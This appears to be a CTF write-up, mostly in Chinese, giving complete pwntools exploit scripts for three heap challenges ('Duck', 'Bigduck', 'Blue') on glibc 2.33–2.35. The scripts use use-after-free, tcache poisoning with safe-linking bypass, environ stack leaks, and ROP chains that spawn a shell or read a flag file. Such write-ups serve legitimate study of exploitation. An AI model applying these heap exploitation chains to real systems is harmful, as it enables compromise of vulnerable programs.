Duck
2.34的uaf,简单粗暴,通俗易懂
from pwn import*
r=remote("192.168.166.196",58013)
#r=process('./main')
context.log_level='debug'
libc=ELF("./libc.so.6")
def new():
r.recvuntil(": ")
r.sendline("1")
def delete(idx):
r.recvuntil(": ")
r.sendline("2")
r.recvuntil(": \n")
r.sendline(str(idx))
def show(idx):
r.recvuntil(": ")
r.sendline("3")
r.recvuntil(": \n")
r.sendline(str(idx))
def edit(idx,content):
r.recvuntil(": ")
r.sendline("4")
r.recvuntil(": \n")
r.sendline(str(idx))
r.recvuntil(": \n")
r.sendline(str(len(content)))
r.recvuntil(": \n")
r.send(content)
def xor_ptr(ptr1,ptr2):
result=((ptr1>>12)^(ptr2))
return result
for i in range(10): new()
delete(0)
delete(1)
show(0)
ptr0=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
show(1)
ptr1=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
heap=(ptr0^ptr1)-0x2a0
success("heap: "+hex(heap))
for i in range(2,8): delete(i)
show(7)
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-libc.sym["main_arena"]-0x60
success("libc_base: "+hex(libc_base))
edit(6,p64(xor_ptr(heap,libc_base+libc.sym["environ"])))
new()
new()
show(11)
stack=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x168
success("stack: "+hex(stack))
delete(10)
edit(10,p64(xor_ptr(heap,stack)))
new()
new()
#gdb.attach(r)
edit(13,"a"*0x18+p64(libc_base+0x2daa2)+p64(libc_base+0x1b4689)+p64(libc_base+libc.sym["system"]))
r.interactive()
Bigduck
2.33的uaf配沙箱,泄露environ然后ROP
from pwn import*
r=remote("192.168.166.196",58011)
#r=process('./main')
context.log_level='debug'
libc=ELF("./libc.so.6")
def new():
r.recvuntil(": ")
r.sendline("1")
def delete(idx):
r.recvuntil(": ")
r.sendline("2")
r.recvuntil(": \n")
r.sendline(str(idx))
def show(idx):
r.recvuntil(": ")
r.sendline("3")
r.recvuntil(": \n")
r.sendline(str(idx))
def edit(idx,content):
r.recvuntil(": ")
r.sendline("4")
r.recvuntil(": \n")
r.sendline(str(idx))
r.recvuntil(": \n")
r.sendline(str(len(content)))
r.recvuntil(": \n")
r.send(content)
def xor_ptr(ptr1,ptr2):
result=((ptr1>>12)^(ptr2))
return result
for i in range(10): new()
delete(0)
delete(1)
show(0)
ptr0=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
show(1)
ptr1=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))
heap=(ptr0^ptr1)-0x2a0
success("heap: "+hex(heap))
for i in range(2,8): delete(i)
edit(7,"\x10")
show(7)
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-libc.sym["__malloc_hook"]-0x80
success("libc_base: "+hex(libc_base))
edit(6,p64(xor_ptr(heap,libc_base+libc.sym["environ"])))
new()
new()
show(11)
stack=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-0x168
success("stack: "+hex(stack))
pop_rdi=libc_base+0x28a55
pop_rsi=libc_base+0x2a4cf
pop_rdx=libc_base+0xc7f32
payload=p64(pop_rdi)+p64(stack)+p64(pop_rsi)+p64(0)+p64(pop_rdx)+p64(0)+p64(libc_base+libc.sym["open"])
payload+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(heap)+p64(pop_rdx)+p64(0x30)+p64(libc_base+libc.sym["read"])
payload+=p64(pop_rdi)+p64(1)+p64(libc_base+libc.sym["write"])
delete(10)
edit(10,p64(xor_ptr(heap,stack)))
new()
new()
#gdb.attach(r)
edit(13,"flag"+"\x00"*0x4+payload)
r.interactive()
Blue
目测是最新的libc-2.35,仅有一次show和uaf机会
没有malloc_hook,free_hook和exit,而且传统的IO_file_jumps被放在了不可写段上
利用方法:https://kagehutatsu.com/?p=655
from pwn import*
r=remote("192.168.166.196",58012)
#r=process('./main')
context.log_level='debug'
libc=ELF("./libc.so.6")
def new(size,content):
r.recvuntil(": ")
r.sendline("1")
r.recvuntil(": \n")
r.sendline(str(size))
r.recvuntil(": \n")
r.send(content)
def delete(idx):
r.recvuntil(": ")
r.sendline("2")
r.recvuntil(": \n")
r.sendline(str(idx))
def show(idx):
r.recvuntil(": ")
r.sendline("3")
r.recvuntil(": \n")
r.sendline(str(idx))
def uaf(idx):
r.recvuntil(": ")
r.sendline("666")
r.recvuntil(": \n")
r.sendline(str(idx))
def xor_ptr(ptr1,ptr2):
result=((ptr1>>12)^(ptr2))
return result
for i in range(9): new(0x88,"\n")
for i in range(8): delete(i)
for i in range(7): new(0x88,"\n")
new(0x18,"aaaaaaaa")
show(7)
r.recvuntil("a"*0x8)
libc_base=u64(r.recvuntil("\n",drop=True).ljust(0x8,"\x00"))-libc.sym["__malloc_hook"]-0x70-0x80
success("libc_base: "+hex(libc_base))
pop_rdi=libc_base+0x23b6a
pop_rsi=libc_base+0x2601f
pop_rdx=libc_base+0x142c92
gadget=libc_base+0x151990
payload=p64(pop_rdi)+p64(0)+p64(libc_base+libc.sym["alarm"])+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(libc_base+0x222060+0x980)+p64(pop_rdx)+p64(0x200)+p64(libc_base+libc.sym["read"])
for i in range(11): new(0x78,"\n")
for i in range(8,17): delete(i)
uaf(18)
delete(19)
delete(18)
for i in range(7): new(0x78,"\n")
new(0x78,p64(libc_base+0x222060+0xf00))
new(0x78,"\n")
new(0x78,"\n")
new(0x78,"flag\x00\x00\x00\x00"+p64(gadget))
for i in range(8,15): delete(i)
delete(15)
delete(17)
delete(18)
for i in range(7): new(0x78,"\n")
new(0x78,p64(libc_base+0x222060+0x908))
new(0x78,"\n")
new(0x78,"\n")
new(0x78,p64(libc_base+0x8e22e)+p64(libc_base+0x222060+0x908)+p64(0)*2+p64(libc_base+0x5b4d0)+payload[:0x50])
for i in range(8,15): delete(i)
delete(15)
delete(17)
delete(18)
for i in range(7): new(0x78,"\n")
new(0x78,p64(libc_base+libc.sym["_IO_2_1_stdout_"]+0xd0))
new(0x78,"\n")
new(0x78,"\n")
#gdb.attach(r,"b _dl_addr")
r.recvuntil(": ")
r.sendline("1")
r.recvuntil(": \n")
r.sendline(str(0x78))
payload=p64(pop_rdi)+p64(libc_base+0x222f60)+p64(pop_rsi)+p64(0)+p64(libc_base+libc.sym["open"])
payload+=p64(pop_rdi)+p64(3)+p64(pop_rdx)+p64(0x30)+p64(libc_base+libc.sym["read"])
payload+=p64(pop_rdi)+p64(1)+p64(libc_base+libc.sym["write"])
r.send(payload)
r.interactive()
附件下载